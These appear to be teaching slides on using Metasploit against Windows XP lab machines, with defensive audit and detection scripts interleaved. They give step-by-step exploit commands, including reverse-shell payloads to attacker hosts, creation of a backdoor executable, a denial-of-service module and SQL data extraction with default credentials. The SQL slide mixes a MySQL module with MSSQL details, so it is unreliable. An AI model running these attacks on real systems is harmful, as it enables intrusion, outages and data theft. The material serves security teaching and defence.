Exploiting with Metasploit - hacking windows xp

Hui Li, Wei Chen, Rachit Mathur, Darshan Darbari

Outline

• A Serious Security Issue
• Metasploit Introduction
• Basic Terms
• Metasploit Downloading
• Metasploit Installation
• Get Ready to Exploit
• Metasploit Attacks

A Serious Security Issue

• Symantec blocked more than 5.5 billion malicious attacks in 2011.
• Malicious attacks skyrocketed by more than 81% compared with 2010.
• More than 232.4 million identities were exposed.
• Over 154 targeted attacks took place per day in Dec. 2011.

-- Symantec Internet Security Threat Report 2011 Trends

Metasploit Introduction

• Tool for developing & testing of vulnerabilities.
• Started by H. D. Moore in 2003
• Acquired by Rapid7
• Remains open source & free to use
• Written in Ruby

Basic Terms

• Vulnerability: Weakness which allows an attacker to break into a system's security.
• Exploit: Code which allows an attacker to take advantage of a vulnerable system.
• Payload: Actual code which runs on the system after exploitation.

Metasploit Downloading

• Metasploit supports Windows, Linux 32-bit and Linux 64-bit.
• The latest version (version 4.3 for now) is available on the following official website: http://www.metasploit.com/download/


Installing Metasploit on Windows

Disable anti-virus software and firewalls


Installing Metasploit on Ubuntu (Linux)

Use command

sudo chmod +x metasploit-latest-linux-installer.run

to give permission to execute the file

Use command

sudo ./metasploit-latest-linux-installer.run

to execute the file


Installing Windows XP Virtual Machine

• Windows XP Mode with Virtual PC
  It can be downloaded from the following official website.
  http://www.microsoft.com/windows/virtual-pc/download.aspx

• Windows XP with VMware Player
  VMware Player is available on the following official website.
  http://www.vmware.com/products/player/overview.html


Installing Ubuntu Virtual Machine

Ubuntu with VMware Player

• An Ubuntu 9 virtual machine file that can run in VMware Player is available on the following website
  http://128.230.208.57/SEEDUbuntu9_August_2010.tar.gz

• The latest version of the Ubuntu installation files (.iso), which can be made into a virtual machine, is on the following official website
  http://www.ubuntu.com/download/desktop


IP Configuration

Make sure that all machines used to perform exploits are in the same network.

• Method 1: use the network adapter Bridge setting
• Method 2: set IP, subnet mask, default gateway and DNS manually

Set Protocol (TCP/IP) Properties according to the host machine

Metasploit Attacks

• MS08_067 Vulnerability Attack
• Backdoor Exploit
• MS10_018 IE Vulnerability Attack
• MS10_046 Vulnerability Attack
• MS10_002_aurora Vulnerability Attack
• Talkative IRC Response Attack
• NAT Helper DOS Attack
• Reverse Shell Attack
• SQL Server Generic Exploit

MS08_067 Vulnerability Attack

Description:
This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs.

Targets:
Windows XP

Objective:
Use ms08_067_netapi from Metasploit on an Ubuntu virtual machine to attack a Windows XP virtual machine.

Metasploit Commands:

• msf> set RHOST 192.168.1.33
• msf> set payload windows/shell/reverse_tcp
  (Set payload so that a cmd shell from the victim's machine will be obtained.)
• msf> set LHOST 192.168.1.43

Prevention:

Microsoft Update MS08_067: Security Update for Windows XP (KB958644)
(http://www.microsoft.com/en-us/download/confirmation.aspx?id=3205)
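One way to check the Prevention step across a lab inventory, as an added example that is not part of the original slides: it parses saved `systeminfo` output and reports which Windows XP hosts do not list KB958644 among their installed hotfixes. The host names, the sample reports and the hotfix id KB0000000 are constructed placeholders.

```python
import re

REQUIRED_KB = "KB958644"  # MS08_067 security update named on the slide

# Constructed `systeminfo` excerpts keyed by hypothetical lab host names.
# Hotfix ids other than KB958644 are placeholders for illustration.
SAMPLE_REPORTS = {
    "xp-lab-01": """\
Host Name:                 XP-LAB-01
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 2 Build 2600
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 6 Model 23 Stepping 10 GenuineIntel
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: File 1
                           [02]: Q147222
                           [03]: KB958644 - Update
""",
    "xp-lab-02": """\
Host Name:                 XP-LAB-02
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: Q147222
                           [02]: KB0000000 - Update
""",
    "xp-lab-03": """\
Host Name:                 XP-LAB-03
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 2 Build 2600
Hotfix(s):                 N/A
""",
    "win7-admin": """\
Host Name:                 WIN7-ADMIN
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: KB0000000
""",
}

OS_NAME = re.compile(r"^OS Name:\s*(.+?)\s*$", re.MULTILINE)
HOTFIX_ENTRY = re.compile(r"\s+\[\d+\]:\s*(\S+)")


def installed_hotfixes(report):
    """Return the hotfix ids listed under the 'Hotfix(s):' header only.

    Other sections (processors, network cards) use the same '[NN]:' layout,
    so entries are collected only until the hotfix section ends.
    """
    ids = set()
    in_section = False
    for line in report.splitlines():
        if line.startswith("Hotfix(s):"):
            in_section = True
            continue
        if in_section:
            match = HOTFIX_ENTRY.match(line)
            if match is None:
                break  # first non-entry line closes the section
            ids.add(match.group(1).upper())
    return ids


def audit(reports, required=REQUIRED_KB):
    """Map each host to 'patched', 'MISSING' or 'out of scope'."""
    results = {}
    for host, report in reports.items():
        match = OS_NAME.search(report)
        os_name = match.group(1) if match else ""
        if "Windows XP" not in os_name:
            # The slide names Windows XP as the target; other systems
            # are not judged by this check.
            results[host] = "out of scope"
        elif required in installed_hotfixes(report):
            results[host] = "patched"
        else:
            results[host] = "MISSING"
    return results


if __name__ == "__main__":
    for host, status in sorted(audit(SAMPLE_REPORTS).items()):
        print(f"{host:12} {REQUIRED_KB}: {status}")
```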


Backdoor Exploit

Description:
Use a backdoor program to attack a system.

Preparation:
• An Ubuntu virtual machine (seed) with Metasploit installed on it.
• Another Ubuntu virtual machine (harry) with Metasploit and Wine installed on it. (Wine will be used to run the backdoor program.)

Objective:
• Create a backdoor program on Ubuntu VM harry, with specific configurations.
• Use exploit handler from Metasploit on Ubuntu VM seed.
• Set options of handler according to the configurations of the backdoor program, and exploit.
• Run the backdoor program on Ubuntu VM harry.
• Ubuntu VM seed gets a session and VM harry is exploited.

Commands to create the backdoor program with certain configurations:

ubuntu:~/Desktop$ sudo msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.43 LPORT=4444 x>harry.exe

• (Use a Windows payload because the backdoor program will be run by Wine in Ubuntu as a Windows program, .exe file.)
• (Set LHOST and LPORT to the values that will be set in the options of the exploit on the attacker's machine.)

Metasploit Commands:

msf> set payload windows/meterpreter/reverse_tcp
msf> set LHOST 192.168.1.43
msf> set LPORT 4444
(Like the backdoor program was configured.)

• Start the payload handler on VM seed.
• Then run the backdoor program on VM harry.

As the backdoor was run on VM harry, VM seed gets a session and VM harry is exploited.

Prevention:

Avoid programs with malicious backdoors.
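The session that VM seed receives is an outbound TCP connection from VM harry to LHOST:LPORT, so it is visible on harry as an established connection it initiated itself. The following added example (not part of the original slides) finds such connections in `netstat -ant` style output by separating inbound from outbound connections and comparing remote ports against an egress allowlist. The allowlist, the sample output and every address except 192.168.1.43 are constructed assumptions.

```python
# Remote ports this lab host is expected to reach (assumed policy).
EGRESS_ALLOWLIST = {53, 80, 443}
# 4444 is the LPORT set on the slides and Metasploit's default handler port.
# LPORT is whatever the handler was configured with, so this match only
# raises severity; the allowlist comparison does the actual detection.
HANDLER_PORTS = {4444}

# Constructed `netstat -ant` output from a host in the role of VM harry
# (192.168.1.50 is a made-up address for it).
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 192.168.1.50:22         192.168.1.10:51544      ESTABLISHED
tcp        0      0 192.168.1.50:48210      192.168.1.43:4444       ESTABLISHED
tcp        0      0 192.168.1.50:39122      203.0.113.10:443        ESTABLISHED
tcp        0      0 192.168.1.50:50122      198.51.100.7:8443       ESTABLISHED
tcp        0      0 192.168.1.50:41876      192.168.1.1:53          TIME_WAIT
tcp6       0      0 :::80                   :::*                    LISTEN
"""


def split_endpoint(endpoint):
    """Split 'addr:port' (IPv4 or netstat-style IPv6) into (addr, port)."""
    addr, _, port = endpoint.rpartition(":")
    return addr, port


def parse_tcp(netstat_text):
    """Return one dict per TCP row; header and non-TCP lines are skipped."""
    rows = []
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) < 6 or not fields[0].startswith("tcp"):
            continue
        laddr, lport = split_endpoint(fields[3])
        raddr, rport = split_endpoint(fields[4])
        rows.append({"laddr": laddr, "lport": lport,
                     "raddr": raddr, "rport": rport, "state": fields[5]})
    return rows


def suspicious_egress(netstat_text, allowlist=EGRESS_ALLOWLIST):
    """List (severity, remote_addr, remote_port) for unexpected outbound TCP."""
    rows = parse_tcp(netstat_text)
    # A connection whose local port is one we listen on was accepted by us,
    # i.e. it is inbound (the SSH session in the sample), not egress.
    listening = {r["lport"] for r in rows if r["state"] == "LISTEN"}
    findings = []
    for r in rows:
        if r["state"] != "ESTABLISHED" or r["lport"] in listening:
            continue
        rport = int(r["rport"])
        if rport in allowlist:
            continue
        severity = "high" if rport in HANDLER_PORTS else "review"
        findings.append((severity, r["raddr"], rport))
    return findings


if __name__ == "__main__":
    for severity, addr, port in suspicious_egress(SAMPLE_NETSTAT):
        print(f"[{severity}] outbound connection to {addr}:{port}")
```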


MS10_018 IE Vulnerability Attack

Description:
This module exploits a use-after-free vulnerability within the DHTML behaviors functionality of Microsoft Internet Explorer version 6 and 7.
(Internet Explorer 8 and Internet Explorer 5 are not affected.)

Available Targets:
• IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista
• IE 6 SP0-SP2
• IE 7.0

Objective:
Use an IE vulnerability ms10_018_ie_behaviors from Metasploit on a Windows 7 machine to attack a Windows XP virtual machine.


MS10_018 IE Vulnerability Attack

Metasploit Commands:
• msf> set SRVHOST 192.168.1.14
• msf> set payload windows/shell/reverse_tcp
  (Set the payload so that a cmd shell from the victim's machine will be obtained.)
• msf> set LHOST 192.168.1.14


MS10_018 IE Vulnerability Attack

Metasploit Commands:
• msf> sessions
  (See how many sessions were obtained from the attack and what each session is about.)
• msf> sessions -i [id of the session]
  (Use the session to get the shell.)


MS10_018 IE Vulnerability Attack

Prevention:
Microsoft Update MS10-018: Cumulative Security Update for Internet Explorer (980182)
(http://www.microsoft.com/technet/security/bulletin/ms10-018.mspx?pf=true)


MS10_046 Vulnerability Attack

Description:
This module exploits a vulnerability in the handling of Windows Shortcut files that contain an icon resource pointing to a malicious DLL. The module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.

Objective:
Use the LNK shortcut auto-run vulnerability module ms10_046_shortcut_icon_dllloader from Metasploit on a Windows 7 machine to attack a Windows XP virtual machine.


MS10_046 Vulnerability Attack

Metasploit Commands:
• msf> set SRVHOST 192.168.1.14
• msf> set payload windows/shell/reverse_tcp
  (Set the payload so that a cmd shell from the victim's machine will be obtained.)
• msf> set LHOST 192.168.1.14


MS10_046 Vulnerability Attack

Metasploit Commands:
• msf> sessions
  (See how many sessions were obtained from the attack and what each session is about.)
• msf> sessions -i [id of the session]
  (Use the session to get the shell.)


MS10_046 Vulnerability Attack

Prevention:
Microsoft Update MS10-046: Vulnerability in Windows Shell Could Allow Remote Code Execution (2286198)
(http://www.microsoft.com/technet/security/bulletin/MS10-046.mspx?pf=true)


MS10_002_aurora Vulnerability Attack

Description:
This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild and was a key component of the "Operation Aurora" attacks that led to the compromise of a number of high-profile companies.

Objective:
Use the MS10_002_aurora exploit from Metasploit on a Windows 7 machine to attack a Windows XP virtual machine.


MS10_002_aurora Vulnerability Attack

Metasploit Commands:
• msf> set SRVHOST 192.168.1.14
• msf> set payload windows/shell/reverse_tcp
• msf> set LHOST 192.168.1.14


MS10_002_aurora Vulnerability Attack

Prevention:
Update Internet Explorer to a higher version such as IE7 or IE8.


Talkative IRC Response Attack

• Description
  • Talkative IRC suffers from a stack-based buffer overflow vulnerability that enables us to gain full control over the application and execute arbitrary commands.
  • The ECX and EIP registers get overwritten, and so does the SEH.
• Targets
  • Windows XP SP3 English (default)
• Objective
  • Exploit the buffer overflow vulnerability by tempting a user into connecting to a malicious IRC server.


Talkative IRC Response Attack

• Commands
  • msf exploit(talkative_response) > use exploit/windows/misc/talkative_response
  • msf exploit(talkative_response) > set payload windows/shell/reverse_tcp
  • msf exploit(talkative_response) > set SRVHOST 129.63.226.105
  • msf exploit(talkative_response) > set LPORT 4444
  • msf exploit(talkative_response) > set LHOST 129.63.226.105
  • msf exploit(talkative_response) > exploit
  • Open the browser on the victim's machine and enter the URL http://129.63.226.105:4444 (malicious link to the attacker's server).
  • On the attacker machine we get a session along with an id, which is the victim's session. Press CTRL+C on the attacker's Metasploit console and type the command:
  • msf exploit(talkative_response) > sessions -i <session id_number>
  • The attacker's server starts the interaction with the victim's machine and the attacker may be able to execute arbitrary code.


Talkative IRC Response Attack

• Prevention
  • Since this is a fairly new attack and it targets SP3 and below versions, there is no direct solution to prevent this. (source: http://www.osvdb.org/64582)
  • The user should avoid clicking on any link that he cannot recognize and should avoid submitting personal information.


NAT Helper DOS Attack

• Description
  • This module exploits a DoS vulnerability within the Internet Connection Sharing service in Windows XP.
  • This is triggered when a malformed DNS query is sent to a host computer using Internet Connection Sharing. An attacker can crash the remote machine, resulting in a loss of availability.
  • Exploiting this may cause affected computers to crash, denying service to legitimate users.
• Objective
  • The attacker must be able to send malformed network traffic to the interface located on the LAN side of the affected computer.


NAT Helper DOS Attack

• Commands
  • msf auxiliary (nat_helper)> use auxiliary/dos/windows/nat/nat_helper
  • msf auxiliary (nat_helper)> set RHOST 129.63.226.112
  • msf auxiliary (nat_helper)> exploit


NAT Helper DOS Attack

• Prevention
  Currently there are no known upgrades, patches or workarounds available to prevent this attack.
  (Source: www.osvdb.org/30096)


Reverse Shell Attack

Description
• This is an active exploit, which exploits a specific host, runs until completion and then exits.
• This exploit gains a reverse shell on the target system given the required credentials.
• With this exploit the attacker gains the shell prompt of the victim's machine and can add, delete and modify files and folders on the victim's machine.

Objective
• The objective of the exploit is to gain access to the shell prompt of the victim's machine, from which files and folders on the victim's machine can be added, deleted or modified.


Reverse Shell Attack

• Metasploit Commands
  • msf exploit(psexec)> use exploit/windows/smb/psexec
  • msf exploit(psexec)> set RHOST 129.63.226.112
  • msf exploit(psexec)> set payload windows/shell/reverse_tcp
  • msf exploit(psexec)> set LHOST 129.63.226.163
  • msf exploit(psexec)> set LPORT 4444
  • msf exploit(psexec)> exploit


Reverse Shell Attack

• Prevention
  • It can easily be avoided by forcing the type of network logins to be guest only. Open the Control Panel, click Administrative Tools, then Local Security Policy, Local Policies, Security Options, and find the entry called "Network Access: Sharing and security model for local accounts". Change this entry from Classic to Guest only.
  • (Source: http://nullpointer.dk/?q=node/49)
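The script below audits a host for the fixes named on the Prevention slides above: the MS10-018 and MS10-046 updates and the Guest-only logon model. It is an added example, not part of the original slides; the function names and the `-Fix` switch are hypothetical, and the `ForceGuest` registry value name is not on the slides (it is the value behind the policy entry the slide describes).

```powershell
# Added example (not from the slides). Written for PowerShell 2.0 so it also runs on XP SP3.
# Assumption: ForceGuest under HKLM\SYSTEM\CurrentControlSet\Control\Lsa backs the policy
# "Network access: Sharing and security model for local accounts" (0 = Classic, 1 = Guest only).
param([switch]$Fix)   # hypothetical switch: apply the Guest-only setting (needs admin rights)

$LsaKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

# KB numbers exactly as printed on the Prevention slides.
$Hotfixes = @(
    @{ Id = 'KB980182';  Bulletin = 'MS10-018' },
    @{ Id = 'KB2286198'; Bulletin = 'MS10-046' }
)

function Test-HotfixInstalled {
    param([string]$Id)
    # Get-HotFix writes a non-terminating error when the ID is absent;
    # suppress it and treat "no object returned" as not found.
    $hit = Get-HotFix -Id $Id -ErrorAction SilentlyContinue
    return ($null -ne $hit)
}

function Get-ForceGuest {
    $p = Get-ItemProperty -Path $LsaKey -Name ForceGuest -ErrorAction SilentlyContinue
    if ($null -eq $p) { return $null }    # value not present
    return [int]$p.ForceGuest
}

function New-Finding {
    param($Check, $State, $Note)
    New-Object PSObject -Property @{ Check = $Check; State = $State; Note = $Note }
}

$findings = @()

foreach ($h in $Hotfixes) {
    $label = "$($h.Bulletin) ($($h.Id))"
    if (Test-HotfixInstalled -Id $h.Id) {
        $findings += New-Finding $label 'OK' 'Hotfix listed as installed'
    } else {
        # A later cumulative update can replace this KB, so a miss means
        # "verify against the current patch level", not "confirmed vulnerable".
        $findings += New-Finding $label 'REVIEW' 'KB not listed; check for a superseding update'
    }
}

$policy = 'Sharing and security model for local accounts'
$fg = Get-ForceGuest
if ($fg -eq 1) {
    $findings += New-Finding $policy 'OK' 'Guest only'
} elseif ($Fix) {
    # Creates the value if it is missing, otherwise overwrites it.
    Set-ItemProperty -Path $LsaKey -Name ForceGuest -Value 1 -Type DWord
    $findings += New-Finding $policy 'FIXED' 'Changed to Guest only'
} else {
    $findings += New-Finding $policy 'WEAK' 'Classic or not set: local accounts log on over the network as themselves'
}

$findings | Select-Object Check, State, Note | Format-Table -AutoSize
```

With Guest only in effect, network logons that use local accounts are mapped to Guest, so remote administration with local administrator credentials stops working; plan for that before running with `-Fix`.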


Outline

• A Serious Security Issue
• Metasploit Introduction
• Basic Terms
• Metasploit Downloading
• Metasploit Installation
• Get Ready to Exploit
• Metasploit Attacks
  • MS08_067 Vulnerability Attack
  • Backdoor Exploit
  • MS10_018 IE Vulnerability Attack
  • MS10_046 Vulnerability Attack
  • MS10_002_aurora Vulnerability Attack
  • Talkative IRC Response Attack
  • NAT Helper DOS Attack
  • Reverse Shell Attack
  • SQL Server Generic Exploit


SQL Server Generic Exploit

• Description
  • This module will allow for simple SQL statements to be executed against a MSSQL instance given the appropriate credentials.
  • We can set any SQL query on the attacker machine and get the required data from the victim's machine.
• Objective
  • Our objective is to attack Windows 2005 Server Database and run SQL commands to capture the data in the database.


SQL Server Generic Exploit

• Commands
  • msf auxiliary/admin/mysql/mysql_sql
  • msf auxiliary(mysql_sql)> set RHOST 129.63.226.110
  • msf auxiliary(mysql_sql)> set RPORT 1433
  • msf auxiliary(mysql_sql)> set Username sa
  • msf auxiliary(mysql_sql)> set Password password1
  • msf exploit(psexec)> set sql select * from webapp.dbo.users
  • msf auxiliary(mysql_sql)> set USE_WINDOWS_AUTHENT false
  • msf auxiliary(mysql_sql)> exploit


SQL Server Generic Exploit

• Prevention
  • Changing the user name and password of the database on the victim's machine will prevent the attacker.
  • We can also close all the RPORTs (ports that listen on the victim's machine).
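A detection-side complement to the prevention points above, as an added example that is not part of the original slides: the module authenticates as `sa` from a remote host, so remote logins to that account in the SQL Server error log are worth flagging. The log lines are constructed and their layout is an assumption modelled on SQL Server's login-audit messages; the function name, watched account list and allowed-client list are hypothetical.

```python
import re
from collections import defaultdict

# Constructed sample lines, modelled on the login-audit messages SQL Server
# writes to its error log when login auditing is enabled (layout assumed).
SAMPLE_LOG = """\
2012-04-10 14:01:07.31 Logon       Login failed for user 'sa'. [CLIENT: 192.0.2.77]
2012-04-10 14:01:09.02 Logon       Login succeeded for user 'sa'. Connection: non-trusted. [CLIENT: 192.0.2.77]
2012-04-10 14:03:40.88 Logon       Login succeeded for user 'webapp_svc'. Connection: non-trusted. [CLIENT: 192.0.2.10]
2012-04-10 14:05:12.10 Logon       Login succeeded for user 'sa'. Connection: non-trusted. [CLIENT: <local machine>]
"""

LOGIN_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+)\s+Logon\s+"
    r"Login (?P<result>succeeded|failed) for user '(?P<user>[^']*)'"
    r".*\[CLIENT: (?P<client>[^\]]+)\]")

def suspicious_admin_logins(log_text, watched=("sa",),
                            allowed_clients=("<local machine>",)):
    """Count logins to watched accounts per client, skipping allowed clients."""
    hits = defaultdict(lambda: {"succeeded": 0, "failed": 0, "first_seen": None})
    for line in log_text.splitlines():
        m = LOGIN_RE.match(line)
        if not m or m["user"].lower() not in watched:
            continue  # not a login record, or not an account we watch
        if m["client"] in allowed_clients:
            continue  # expected administrative source
        entry = hits[(m["user"].lower(), m["client"])]
        entry[m["result"]] += 1
        entry["first_seen"] = entry["first_seen"] or m["ts"]
    return dict(hits)

if __name__ == "__main__":
    for (user, client), stats in suspicious_admin_logins(SAMPLE_LOG).items():
        print(user, client, stats)
```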


References

http://www.symantec.com/content/en/us/enterprise/other_resources/b-istr_main_report_2011_21239364.en-us.pdf

http://www.metasploit.com/modules/exploit/windows/smb/ms08_067_netapi

http://www.metasploit.com/modules/exploit/windows/browser/ms10_018_ie_behaviors

http://www.metasploit.com/modules/exploit/windows/browser/ms10_046_shortcut_icon_dllloader

http://www.metasploit.com/modules/exploit/windows/browser/ms10_002_aurora

http://www.metasploit.com/modules/auxiliary/admin/mysql/mysql_sql

http://www.metasploit.com/modules/exploit/windows/smb/psexec

http://www.metasploit.com/modules/auxiliary/dos/windows/nat/nat_helper

http://metasploit.com/modules/exploit/windows/misc/talkative_response